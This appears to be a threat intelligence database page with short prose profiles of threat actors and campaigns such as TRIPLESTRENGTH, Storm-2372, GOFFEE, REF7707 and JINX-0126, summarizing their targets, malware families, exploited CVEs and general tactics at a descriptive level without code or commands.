Threat Actors Database

TRIPLESTRENGTH is a financially motivated threat actor targeting cloud environments and on-premises infrastructures for cryptojacking, ransomware, and extortion. They exploit stolen credentials, cookies, and information stealer logs to gain unauthorized access to platforms like Google Cloud, AWS, and Microsoft Azure, deploying the unMiner application for cryptocurrency mining. Their ransomware operations utilize lockers such as Phobos, LokiLocker, and RCRU64, involving lateral movement and mass encryption. TRIPLESTRENGTH also engages in account hijacking and collaborates with partners for ransomware and blackmail operations, advertising their services in hacking-focused Telegram channels.

Storm-2372 is a suspected nation-state actor aligned with Russian interests, engaging in device code phishing campaigns targeting governments, NGOs, and various industries across Europe, North America, Africa, and the Middle East. The actor employs tactics that involve impersonating prominent individuals through third-party messaging services like WhatsApp and Signal to gain rapport before sending phishing invitations. These invitations lure users into completing device code authentication requests, granting Storm-2372 initial access to victim accounts and enabling Graph API data collection activities, including email harvesting. Microsoft has observed the actor utilizing keyword searches within compromised accounts to exfiltrate sensitive information.

Head Mare is a hacktivism focussed threat actor group known for targeting Russia and Belarus sectors using a remote access malware called PhantomRAT. They have been observed executing malicious code through specially crafted RAR archives, different from previous attacks exploiting vulnerabilities. The attribution of their campaign to Ukraine is uncertain due to limited visibility inside Russian networks. PhantomCore's use of RAR archives in their attack chain has been previously observed in other threat actor groups like Forest Blizzard.

GamaCopy is a threat actor first discovered in June 2023, known for launching cyberattacks against Russia’s defense and critical infrastructure sectors by mimicking the TTPs of Gamaredon. The organization has been active since at least August 2021 and primarily uses Russian-language bait documents related to military facilities. Analysis of attack samples shows considerable overlap in code structure and tactics, including the use of 7z-SFX documentation to install UltraVNC and connecting via port 443. GamaCopy employs open-source tools to obfuscate its activities while targeting sensitive information in the context of the Russia-Ukraine conflict.

Mora_001 is a threat actor exhibiting a distinct operational signature that combines opportunistic attacks with ties to the LockBit ecosystem. The actor has been observed exploiting CVE-2024-55591 and CVE-2025-24472 vulnerabilities affecting Fortinet devices. The ransom note associated with Mora_001 includes the same TOX ID used by LockBit, indicating a potential affiliation or shared communication channels. Their post-exploitation patterns suggest a structured playbook that differentiates them from other ransomware operators, including LockBit affiliates.

Linkc is a newly emerged ransomware group that operates an onion-based data leak site and has claimed one victim, a U.S.-based AI and cloud service provider, H2O.ai, which was attacked on January 29, 2025. The group demanded a ransom of $15 million for data decryption and removal, showcasing access to sensitive information, including GPT model source code and customer data. Linkc's DLS is well-constructed and quick to load, indicating potential for future victim listings. However, there is currently no public acknowledgment from the victim, and the group has not engaged in discussions on cybercrime forums.

ScreamedJungle is a threat actor that exploits vulnerabilities in outdated Magento e-commerce platforms to inject malicious JavaScript code, specifically Bablosoft JS, into compromised websites. This actor has harvested millions of browser fingerprints by leveraging vulnerabilities such as CVE-2024-34102 and CVE-2024-20720. ScreamedJungle utilizes PerfectCanvas technology to ensure pixel-perfect replication of legitimate user fingerprints. Group-IB analysts estimate that over 115 e-commerce sites have been impacted by this fingerprint theft campaign.

Storm-0249 is an access broker active since 2021, known for distributing BazaLoader, IcedID, Bumblebee, and Emotet malware. The actor primarily employs phishing emails to deliver malware payloads, as evidenced by a campaign involving tax-themed emails that aimed to distribute BRc4 and Latrodectus malware. Storm-0249 has facilitated initial access for other threat actors, such as Storm-0501, by leveraging compromised credentials and exploiting known vulnerabilities in public-facing servers. Microsoft has detected malicious PDF attachments associated with Storm-0249's phishing campaigns.

GOFFEE is a threat actor that has targeted entities in the Russian Federation since early 2022, employing spear phishing emails with malicious attachments, including modified Owowa and patched explorer.exe. They have utilized PowerTaskel, a non-public Mythic agent in PowerShell, and introduced a new implant called "PowerModul" for attacks against sectors such as media, telecommunications, and government. GOFFEE has increasingly shifted to a binary Mythic agent for lateral movement and has incorporated Word documents with malicious VBA scripts in their infection chains. The group has demonstrated a consistent evolution in their TTPs while maintaining identifiable characteristics that attribute their campaigns with high confidence.

UAT-5918 is an APT group that targets entities in Taiwan, primarily in telecommunications, healthcare, and IT sectors, to establish long-term access for information theft. They exploit N-day vulnerabilities in unpatched web and application servers to gain initial access and utilize web shells, credential harvesting tools like Mimikatz and LaZagne, and red-teaming tools for post-compromise activities. UAT-5918 conducts network reconnaissance to pivot across endpoints, harvesting credentials and sensitive data, including database backups. Their operations show significant overlap with other APT groups in terms of TTPs and targeted industries.

JabaRoot is an Algerian hacker group that has targeted Moroccan government systems, successfully exfiltrating sensitive data from the Ministry of Economic Inclusion and the National Social Security Fund (CNSS). The group has claimed responsibility for the breach, which has raised concerns among cybersecurity experts regarding its scale and impact on citizens' privacy. The motives behind the attack remain unclear, but it has been noted as one of Morocco's most significant cyber-attacks affecting multiple victims. Resecurity has identified the group's activities as part of a broader trend of APT targeting government entities in the region.

Storm-2460 is a threat actor that has exploited elevation of privilege vulnerabilities to deploy PipeMagic malware and ransomware, enabling them to escalate access within compromised environments. They have been observed using the certutil utility to download malware from compromised legitimate third-party websites. Ransomware activity associated with Storm-2460 includes file encryption and the deployment of a ransom note named !_READ_ME_REXX2_!.txt. Microsoft recommends prioritizing security updates for elevation of privilege vulnerabilities to mitigate the impact of this actor's activities.

SEQRITE Labs APT-Team has been tracking and has uncovered a campaign targeting the Baltic State Technical University, a well-known institution for various defense, aerospace, and advanced engineering programs that contribute to Russia’s military-industrial complex. Tracked as Operation HollowQuill, the campaign leverages weaponized decoy documents masquerading as official research invitations to infiltrate academic, governmental, and defense-related networks. The threat entity delivers a malicious RAR file which contains a .NET malware dropper, which further drops other Golang based shellcode loader along with legitimate OneDrive application and a decoy-based PDF with a final Cobalt Strike payload.

DieNet is a hacktivist group that emerged in March 2025, known for conducting DDoS attacks targeting entities associated with political figures, such as Trump businesses. The group has claimed responsibility for disabling ten significant Iraqi websites, framing the action as support for their affiliates in the “Shiite Harvest.” Their operations suggest motivations rooted in sectarian dynamics, with a coordinated effort indicated by the use of hashtags like #DieNet and #Shiite_Harvest. This reflects the use of cyber offensives as tools for political and ideological expression, mirroring offline sectarian tensions.

REF7707 is a cyber campaign targeting government entities, particularly a foreign ministry in South America, utilizing malware families such as FinalDraft, GuidLoader, and PathLoader for persistence and lateral movement. The threat actor employs the Microsoft Graph API for C2 communication, blending malicious traffic with legitimate activity to evade detection. Despite their technical sophistication, REF7707 operators exhibited poor operational security, leading to the exposure of their infrastructure and malware. Their tactics enable the extraction of sensitive data, including passwords and Active Directory information, facilitating ongoing espionage activities.

UAC-0219 is a hacking group observed conducting cyber-espionage operations targeting Ukrainian critical sectors, primarily utilising WRECKSTEEL malware for file exfiltration in both VBScript and PowerShell variants. Their activities focus on gathering intelligence from military innovation hubs, armed forces, law enforcement, and regional government institutions. CERT-UA has linked multiple cyber-attacks against government agencies and critical infrastructure in Ukraine to UAC-0219, emphasizing their reliance on specialized malware for sensitive information theft. The group’s operations are characterized by stealthy access and data exfiltration tactics, consistent with state-sponsored APT behavior.

Operation ForumTroll is a sophisticated cyber espionage campaign discovered by Kaspersky in mid-March 2025. The attack exploited a zero-day vulnerability in Google Chrome, identified as CVE-2025-2783, which allowed attackers to bypass the browser's security features. Victims were infected by clicking on personalized phishing links in emails, allegedly from the organizers of the "Primakov Readings" forum, targeting media outlets, educational institutions, and government organizations in Russia. The goal of the attack appears to be espionage, and the campaign is believed to be the work of a state-sponsored APT group. Google quickly released an update to fix the vulnerability after being notified by Kaspersky.

Earth Alux is a China-linked APT group known for conducting cyberespionage attacks across various sectors, including government, technology, and telecommunications. They primarily exploit vulnerable services in exposed servers to gain initial access, implanting web shells like GODZILLA and deploying backdoors such as VARGEIT and COBEACON. The group employs tools like RSBINJECT and MASQLOADER for lateral movement and network discovery, while also utilizing RAILSETTER for persistence through mspaint injection. Their operations have predominantly targeted the APAC region and have extended to Latin America, with a focus on exfiltrating sensitive information to attacker-controlled cloud storage.

Water Gamayun exploits the MSC EvilTwin zero-day vulnerability to compromise systems and exfiltrate data, utilizing custom payloads and advanced data exfiltration techniques. Their arsenal includes backdoors like SilentPrism and DarkWisp, as well as information stealers such as Stealc and Rhadamanthys. They employ delivery methods like provisioning malicious payloads through signed Microsoft Installer files and leveraging LOLBins to maintain persistence and control over infected systems. Comprehensive analysis of their command-and-control infrastructure reveals sophisticated evasion techniques and dynamic control capabilities.

Wiz Threat Research identified a new variant of an ongoing malicious campaign targeting misconfigured and publicly exposed PostgreSQL servers. In the observed attack, the threat actor (tracked by Wiz as JINX-0126) abuses exposed PostgreSQL instances, configured with weak and guessable login credentials, to gain access and to deploy XMRig-C3 cryptominers. This campaign was first documented by Aqua Security, but the threat actor has since evolved, implementing defense evasion techniques such as deploying binaries with a unique hash per target and executing the miner payload filelessly—likely to evade detection by CWPP solutions that rely solely on file hash reputation.